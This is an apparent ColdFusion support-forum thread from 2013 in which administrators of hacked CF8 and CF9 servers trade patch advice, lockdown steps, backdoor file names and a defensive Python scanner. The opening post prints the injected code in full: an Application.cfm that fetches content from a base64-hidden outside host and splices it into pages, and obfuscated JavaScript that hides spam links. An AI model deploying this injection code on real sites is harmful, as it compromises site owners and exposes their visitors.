
CF8.01 hacked. Need info on patches

New Here, Feb 04, 2013

Yesterday some of our hosted sites were hacked using the code pasted below. We're running CF 8.01 and I'm wondering if there is a cumulative security patch that we can apply, or if I should just apply every security patch that I can find. I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.

Here's the hack:

  1. Application.cfm

<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)>
  <cfsavecontent variable="paga">
    <CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
    <cfset mmy = cfhttp.FileContent>
    <cfoutput>
    #mmy#
    </cfoutput>
  </cfsavecontent>
  <CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
  <cfset cfs = cfhttp.FileContent>
  <cfif (FindNoCase("</div>",paga) GT 0)>
    <cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
  <cfelseif (FindNoCase("</table>",paga) GT 0)>
    <cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
  <cfelseif (FindNoCase("</a>",paga) GT 0)>
    <cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
  <cfelse>
    <cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
  </cfif>
  <cfoutput>
  #paga#
  </cfoutput>
  <cfabort>
</cfif>

<cffunction name="hSWaawe">
  <cfargument name="HxzcGlk">
  <cfset Ypg = ToString(ToBinary(HxzcGlk))>
  <cfreturn Ypg>
</cffunction>

  2. Index.htm

<html>
  <head>
    <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">
  </head>
  <body>
    <br>
    <br>
    <br>
    <br>
    <center>
      <a href="http://www.thehiltonorlando.com/">This page has moved.  Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
</script>
<p class="zdroq">
Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>
    </center>
  </body>
</html>

Thanks in advance.

--Jeremy

Views: 28.7K

Community guidelines: Be kind and respectful, give credit to the original source of content, and search for duplicates before posting.
Adobe Employee, Feb 04, 2013

Hi Jeremy

Can you please provide the CVE code?

Regards

Swaraj

New Here, Feb 04, 2013

These are for CF9 and 10.  I've found nothing for CF8 yet.

CVE-2013-0625, CVE-2013-0629, CVE-2013-0631 and CVE-2013-0632

http://www.adobe.com/support/security/bulletins/apsb13-03.html

Adobe Employee, Feb 04, 2013

Hi Jeremy

The lines below are mentioned in the article:

Note that ColdFusion customers using an unsupported version of ColdFusion (including ColdFusion 8.x and earlier) can protect themselves from CVE-2013-0625, CVE-2013-0629 and CVE-2013-0632 by configuring the following:

  • Setting the password for Remote Development Services (even if RDS is disabled) 
  • Enabling password protection for RDS 
  • Setting the Admin password and enabling password protection for Administrator

Can you please try them?

Regards

Swaraj

New Here, Feb 04, 2013

Swaraj, thanks for the quick response.  I'll apply these patches and settings asap.

--Jeremy

New Here, Feb 04, 2013

My company is running CF 9.0 and we patched our servers last week. However, we got hacked this weekend as well. They added that code, plus a JavaScript snippet, to every index.cfm file on our server (hundreds of files).

RDS is disabled, there is now an RDS password, and the CF Admin has a password.  If anyone has any information on how these hackers got in it would be greatly appreciated.

Guest, Feb 04, 2013

Yes, I would like to know how this all happens as well - this hacking business in CF. Any clues?

We are going to install the patch tomorrow when my network guy gets in. It worries me that sduncanute has installed already and is still having issues.

New Here, Feb 04, 2013

Part of the issue *may* be related to having the cfide/administrator folder exposed to outside users.  Be sure you block remote access to that folder and perhaps also the cfide/adminapi folder (which is where I got hacked).

NOTE: Blocking the /cfide folder may break some CF features, like CFFORM, so leave access for that.

I am not sure this will work, but it may help.

Guest, Feb 04, 2013

I just had a crazy morning trying to figure out why our site was breaking, posting crazy text, ruining our redirect to mobile site, etc.  Then I found this post and saw the code that I discovered on our site with Firebug that matched exactly what you posted.  We are running CF9, and you say there is a patch?  Where might we find that?

Thanks for your help.

Community Beginner, Feb 04, 2013

I had this same problem this morning, and I am running 9.0.1 and already have hf901-00008.jar installed, which means I have that patch already. Any other ideas??

Adobe Employee, Feb 04, 2013

Hi PocoDiablo and sduncanute

Have you had a chance to apply this http://www.adobe.com/support/security/bulletins/apsb13-03.html for the same reasons?

Regards

Swaraj

Community Beginner, Feb 04, 2013

Albusteck,

As noted, I have gone through that bulletin and I am running the latest jar file.  I've already done everything on that list.  Now what?  This was patched weeks ago.

Sue

New Here, Feb 04, 2013

Hi Swaraj, I did in fact apply that patch to my servers last Monday.

Enthusiast, Feb 04, 2013

Those that have already applied the latest patch on CF9/10 but have been hacked: do you have a file /CFIDE/h.cfm, /CFIDE/i.cfm or /CFIDE/help.cfm? It is possible you had already been hit before applying the patch and still had a backdoor on your server. Note the file could be pretty much anywhere, but under /CFIDE somewhere is a likely location.

It is also possible that you have common third party software with a vulnerability that was hit, among many other things. It would be a good idea to review the web server logs around the time of the incident to see if you can uncover anything.

If you find something that appears to be a new exploit you should send it to the Adobe Product Security Incident Response Team rather than posting it here: http://www.adobe.com/support/security/alertus.html

In addition to applying patches you should also follow the ColdFusion Lockdown Guides:

http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-...

http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion-enterprise/pdf/CF1...

Pete Freitag,
HackMyCF.com

Foundeo Inc.

Community Beginner, Feb 05, 2013

Pete,

I have contacted Adobe and sent them off a bunch of my files at their request.  I just saw this message and went looking and yes, I had the h.cfm in my CFIDE root directory with a December 25th date. 

I found those lockdown guides not long ago and have gone through all of it for our new server, but didn't for this one. 

Any other files I should be looking for?

New Here, Feb 05, 2013

Pete, my server does indeed have those files - /CFIDE/h.cfm /CFIDE/i.cfm.

They appeared on 1/2/2013, which is significantly after the previously mentioned hotfix released on Jan 15th, 2013:

http://www.adobe.com/support/security/bulletins/apsb13-03.html

Guest, Feb 05, 2013

So, I have located the h.cfm and i.cfm files.  What are you suggesting to do with these files?

Enthusiast, Feb 06, 2013

If you have the /CFIDE/h.cfm or /CFIDE/i.cfm files, they are not part of ColdFusion and were placed there by an attacker. So you should delete them! You should probably do a fresh OS and CF install at this point; be sure to use new passwords for everything.

There have been reports of files being added under the /CFIDE/adminapi directory as well in recent attacks, so you will want to look there as well (check file timestamps on all your files in CFIDE), but as I said consider doing a full reinstall.

--

Pete Freitag

HackMyCF.com - ColdFusion Server Security Scanner

FuseGuard.com - Web Application Firewall for ColdFusion
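
As an added example (not code from the thread, from Adobe, or from Foundeo), the Python sweep below does what Pete's two posts describe: it flags files carrying strings from the injected Application.cfm and index.htm Jeremy posted (the Archivver user-agent check, the self-refetch URL, the ToString(ToBinary()) decode and the zdroq/zdrViewState script) and lists files under any CFIDE directory changed after a given date, so timestamps can be compared against the day of the incident. The web root it scans is constructed inline; the signature names and the 90-day window are assumptions.

```python
import os, re, tempfile
from datetime import datetime, timedelta

# Strings lifted from the injected Application.cfm / index.htm quoted in the thread
# (ToString(ToBinary()) is also ordinary base64 decoding, so treat it as a weak hint).
SIGNATURES = {
    "archivver_ua": re.compile(r'userAgent\s*=\s*"Archivver"', re.I),
    "self_refetch": re.compile(r"#SERVER_NAME##SCRIPT_NAME#\?#QUERY_STRING#", re.I),
    "b64_url_decode": re.compile(r"ToString\s*\(\s*ToBinary\s*\(", re.I),
    "zdr_script": re.compile(r'zdrViewState|class="zdroq"', re.I),
}
SCAN_EXTS = (".cfm", ".cfc", ".htm", ".html")


def scan_webroot(root, modified_since):
    """Return (hits, recent): hits maps path -> matched signature names; recent lists
    files under any CFIDE directory whose mtime is at/after modified_since (datetime)."""
    hits, recent = {}, []
    cutoff = modified_since.timestamp()
    for dirpath, _dirs, files in os.walk(root):
        in_cfide = "cfide" in dirpath.lower().split(os.sep)
        for name in files:
            if not name.lower().endswith(SCAN_EXTS):
                continue
            path = os.path.join(dirpath, name)
            if in_cfide and os.path.getmtime(path) >= cutoff:
                recent.append(path)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            found = [k for k, rx in SIGNATURES.items() if rx.search(text)]
            if found:
                hits[path] = found
    return hits, sorted(recent)


def demo():
    """Build a constructed web root (not real server data), scan it, return relative paths."""
    root = tempfile.mkdtemp()
    injected = ('<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><CFHTTP METHOD = "Get" '
                'URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">'
                '<cfset Ypg = ToString(ToBinary(HxzcGlk))></cfif>')
    files = {"site/Application.cfm": injected,
             "CFIDE/h.cfm": "<!--- constructed stand-in for a dropped file --->",
             "CFIDE/administrator/index.cfm": "<!--- constructed stand-in for a stock file --->"}
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    # Age the stock administrator file by 400 days so only the dropped h.cfm counts as recent.
    old = (datetime.now() - timedelta(days=400)).timestamp()
    os.utime(os.path.join(root, "CFIDE/administrator/index.cfm"), (old, old))
    hits, recent = scan_webroot(root, datetime.now() - timedelta(days=90))
    relp = lambda p: os.path.relpath(p, root).replace(os.sep, "/")
    return {relp(p): v for p, v in hits.items()}, [relp(p) for p in recent]
```

Anything the sweep lists is a triage lead, not proof: compare each recent CFIDE file against a clean install of the same version and check the web server logs for the hour around its timestamp, as Pete suggests.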

Guest, Feb 07, 2013

There is a file called fusebox.cfm with a time stamp date of 2/6/13 in the adminapi/customtags directory. Is this legit?  And if so, what is it?

Also a file called adss.cfm with a 2/3/13 time stamp in the same directory.  This seems to be part of the attack.  Can you verify this to be true? 

Thanks.

Community Beginner, Feb 07, 2013

These files are part of the hack.  Make a copy of these and then delete them.  I kept a copy of everything so that I can share the info with Adobe, who are following up with this.

Do a search on your whole server for anything else that has those date stamps that looks weird.

I zapped my entire website and restored it, and then went through all of the log files and the whole ColdFusion installation looking for odd items.

We are moving to a new server as soon as I finish migrating my Access databases to MS SQL, otherwise I would be doing a full re-install.

Sue

New Here, Feb 08, 2013

The h.cfm file was added to my server on 11/17/2012.  This was done by creating a scheduled task, running it, and then deleting the task so I would not see it.  Yes, my /administrator and /adminapi directories were still available.  I realize I've been too lax -- have been using ColdFusion for over a decade with no major security issues, so I didn't pay close attention to locking out these directories to public IP addresses.

The h.cfm file was called several times over December and January, but nothing else was done.

On 2/3 some text was added to several index.cfm pages, but they were not the default pages and therefore the attack didn't take down the server.

I removed h.cfm, i.cfm, fusebox.cfm and adss.cfm. I renamed h.cfm, found the password inside it, and tried it. I was able to see what the attacker could see. Passwords for data sources, in particular, were available.

After plugging the hole, then removing the files, I would suggest changing all datasource passwords, as the attackers would have gained access to them.

Contributor, Feb 08, 2013

Will restricting access to the CFIDE folder prevent this exploit, or is it more involved than that?

New Here, Feb 19, 2013

My server was also hacked, with the "payday loans" code appearing on most index.cfm and index.html pages. After deleting the injected code, it reappeared 3 days later. I believe I have since discovered the real culprit -- a modified application.cfm in the CFIDE directory.

New Here, Feb 20, 2013

EcleticDan - what version of CF were you running, and were you fully patched? Any suggestions on what we can do to protect ourselves? I locked out /cfide/administrator so no one can get to it unless you RDC to the server.
